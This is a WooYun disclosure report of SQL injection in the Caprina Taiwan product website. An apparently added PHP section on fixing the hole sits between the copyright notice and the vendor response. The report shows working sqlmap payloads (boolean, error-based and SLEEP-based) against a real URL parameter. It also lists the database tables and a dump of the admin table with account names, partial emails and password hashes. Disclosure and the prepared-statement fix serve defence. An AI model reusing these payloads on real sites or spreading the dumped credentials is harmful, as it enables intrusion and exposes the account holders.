
Vulnerability summary

Defect ID: wooyun-2015-0165856

Title: SQL injection in Caprina 肯拿士台灣官方網站 (Caprina Taiwan official website), Taiwan region

Vendor: Caprina 肯拿士台灣官方網站

Author: 路人甲

Submitted: 2015-12-30 18:01

Fixed: 2016-02-12 18:49

Published: 2016-02-12 18:49

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner (Hitcon, the Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-12-30: Details sent to the vendor; awaiting vendor handling
2015-12-31: Vendor confirmed; details disclosed to the vendor only
2016-01-10: Details disclosed to core white hats and experts in the relevant field
2016-01-20: Details disclosed to regular white hats
2016-01-30: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public

Brief description:

Detailed description:

Caprina 肯拿士台灣官方網站 (Caprina Taiwan official website) has SQL injection.
Caprina 肯拿士 products moisturize your skin with fresh, pure goat milk: the finest natural moisturizer, and the secret formula that gives users a healthy glow and a good mood.
Injection point: http://**.**.**.**/product_list.php?i=1

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: i (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: i=1 AND 3598=3598
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: i=1 AND (SELECT 8960 FROM(SELECT COUNT(*),CONCAT(0x716b786b71,(SELECT (ELT(8960=8960,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: i=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ErnH)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: '[email protected].%'
current database: 'DBL02554'
current user is DBA: False
available databases [2]:
[*] DBL02554
[*] information_schema


Database: DBL02554
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| admin_log        | 157     |
| news_album       | 44      |
| product_album    | 41      |
| faq_album        | 22      |
| member_album     | 8       |
| product_kind_sub | 8       |
| web_album        | 8       |
| admin_block      | 7       |
| channel_album    | 7       |
| admin            | 3       |
| product_kind     | 2       |
+------------------+---------+


Table: admin
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| level    | int(1)       |
| a_id     | bigint(1)    |
| account  | varchar(20)  |
| email    | varchar(200) |
| lastdate | datetime     |
| name     | varchar(10)  |
| pwd      | varchar(60)  |
| que      | int(3)       |
| statu    | int(1)       |
+----------+--------------+
Database: DBL02554
Table: admin
[3 entries]
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+
| a_id | pwd                                 | que | name    | statu | email                  | level   | account | lastdate            |
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+
| 1    | 987a7bec28f18f4ec07777294855266d    | 1   | 里歐    | 2     | leoyeh@**.**.**.**     | 1       | leoyeh  | 2013-06-11 00:04:36 |
| 2    | 5768d3c648f6569bd08ac218cc106d88    | 0   | Caprina | 1     | caprina@**.**.**.**    | 2       | admin   | 2015-12-22 13:59:21 |
| 3    | d41d8cd98f00b204e9800998ecf8427e () | 0   | Aaa as  | 2     | Zzz                    | 2       | Zzz     | 2013-05-29 08:38:01 |
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+

Proof of vulnerability:

Fix plan:

Copyright notice: please credit the source when republishing: 路人甲@乌云
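The report leaves the fix section empty, so the following is an added example, not code from the original report or from the Caprina site. It shows the kind of PHP pattern that produces an injectable `product_list.php?i=1` and the hardened form beside it: the `i` parameter is validated as an integer and then bound as a typed parameter to a prepared statement, so none of the sqlmap payloads quoted above (`AND 3598=3598`, the `FLOOR(RAND(0)*2)` error-based probe, the `SLEEP(5)` time-based probe) can ever reach MySQL as SQL. The table and column names (`product_album`, `kind_id`), the DSN and the credentials are assumptions; the report only gives the URL and the sqlmap output.

```php
<?php
// Added example (not from the original report). Assumed schema: product_album(id, name, kind_id).

// --- Vulnerable pattern (assumed; this is how a GET parameter typically ends up in the query) ---
// The raw value of ?i= is concatenated into the SQL text, so "1 AND 3598=3598" or
// "1 AND (SELECT * FROM (SELECT(SLEEP(5)))x)" is executed exactly as supplied.
function productListVulnerable(PDO $db, array $get): array
{
    $i = $get['i'];
    $sql = "SELECT id, name FROM product_album WHERE kind_id = $i";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened version ---
// 1. Reject anything that is not a positive integer before it goes near the database.
// 2. Keep user input out of the SQL text entirely by binding it as a typed parameter.
function productListSafe(PDO $db, array $get): array
{
    $i = filter_var(
        $get['i'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($i === false) {
        http_response_code(400);   // bad parameter: no query is run at all
        return [];
    }
    $stmt = $db->prepare('SELECT id, name FROM product_album WHERE kind_id = :i');
    $stmt->bindValue(':i', $i, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection settings (DSN, user and password are placeholders, not the site's real values).
$pdo = new PDO(
    'mysql:host=localhost;dbname=DBL02554;charset=utf8mb4',
    'app_readonly',
    'CHANGE_ME',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares, not client-side escaping
    ]
);

try {
    header('Content-Type: application/json');
    echo json_encode(productListSafe($pdo, $_GET));
} catch (PDOException $e) {
    // Never echo the database error to the client: the error-based payload in the
    // report works precisely because MySQL's error text was reaching the response.
    error_log($e->getMessage());
    http_response_code(500);
}
```

Two further points follow from the sqlmap output itself. The error-based technique depends on MySQL error messages being returned in the page, so `display_errors` should be off in production and database exceptions logged server-side only, as above. And the dump of the `admin` table shows that the web application's database account could read every table in `DBL02554`; a product-listing page needs only `SELECT` on the product tables, so granting the application user that and nothing more would have limited what an injection in `product_list.php` could reach.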


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-12-31 02:52

Vendor reply:

Thanks for the report.

Latest status:

None yet